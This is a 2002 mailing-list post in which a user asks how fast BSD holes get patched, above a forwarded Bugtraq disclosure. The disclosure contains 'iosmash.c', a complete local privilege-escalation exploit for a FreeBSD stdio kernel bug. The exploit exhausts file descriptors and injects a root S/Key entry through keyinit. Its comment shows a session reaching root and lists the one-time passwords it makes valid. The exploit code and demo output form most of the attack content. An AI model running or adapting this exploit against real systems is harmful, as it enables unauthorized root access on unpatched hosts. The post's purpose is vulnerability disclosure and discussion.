I did not think *bsd distros had such holes. How long does it usually
take the team to patch them?
scott
On Tuesday, April 23, 2002, at 08:01 AM, [EMAIL PROTECTED] wrote:
----- Forwarded message from Joshua Thayer <[EMAIL PROTECTED]> -----
Delivered-To: [EMAIL PROTECTED]
Envelope-to: [EMAIL PROTECTED]
Date: Tue, 23 Apr 2002 10:57:16 -0700 (PDT)
From: Joshua Thayer <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Subject: cheers (fwd)
X-Return-Path: [EMAIL PROTECTED]
---------- Forwarded message ----------
Date: Tue, 23 Apr 2002 10:42:49 -0700 (PDT)
From: Eric Scheide <[EMAIL PROTECTED]>
To: Joshua Thayer <[EMAIL PROTECTED]>
Subject: cheers (fwd)
--
Eric Scheide, [EMAIL PROTECTED]
Chief Technology Officer
---------- Forwarded message ----------
Date: Mon, 22 Apr 2002 23:24:08 -0700
From: KF <[EMAIL PROTECTED]>
To: bugtraq <[EMAIL PROTECTED]>, vuln-dev
<[EMAIL PROTECTED]>
Subject: cheers
http://www.phased.home.ro/iosmash.c
-KF
/*
phased/b10z
[EMAIL PROTECTED]
23/04/2002
stdio kernel bug in All releases of FreeBSD up to and including
4.5-RELEASE
decided to make a trivial exploit to easily get root :)
id
uid=1003(phased) gid=999(phased) groups=999(phased)
./iosmash
Adding phased:
<--- HIT CTRL-C --->
su
s/key 98 snosoft2
Password:MASS OAT ROLL TOOL AGO CAM
xes#
this program makes the following skeys valid
95: CARE LIVE CARD LOFT CHIC HILL
96: TESS OIL WELD DUD MUTE KIT
97: DADE BED DRY JAW GRAB NOV
98: MASS OAT ROLL TOOL AGO CAM
99: DARK LEW JOLT JIVE MOS WHO
http://www.snosoft.com
cheers Joost Pol
*/
#include <stdio.h>
#include <unistd.h>
int main(int argc, char *argv[]) {
while(dup(1) != -1);
close(2);
execl("/usr/bin/keyinit",
"\nroot 0099 snosoft2 6f648e8bd0e2988a Apr 23,2666
01:02:03\n");
}
----- End forwarded message -----
_______________________________________________
LUAU mailing list
[EMAIL PROTECTED]
http://videl.ics.hawaii.edu/mailman/listinfo/luau
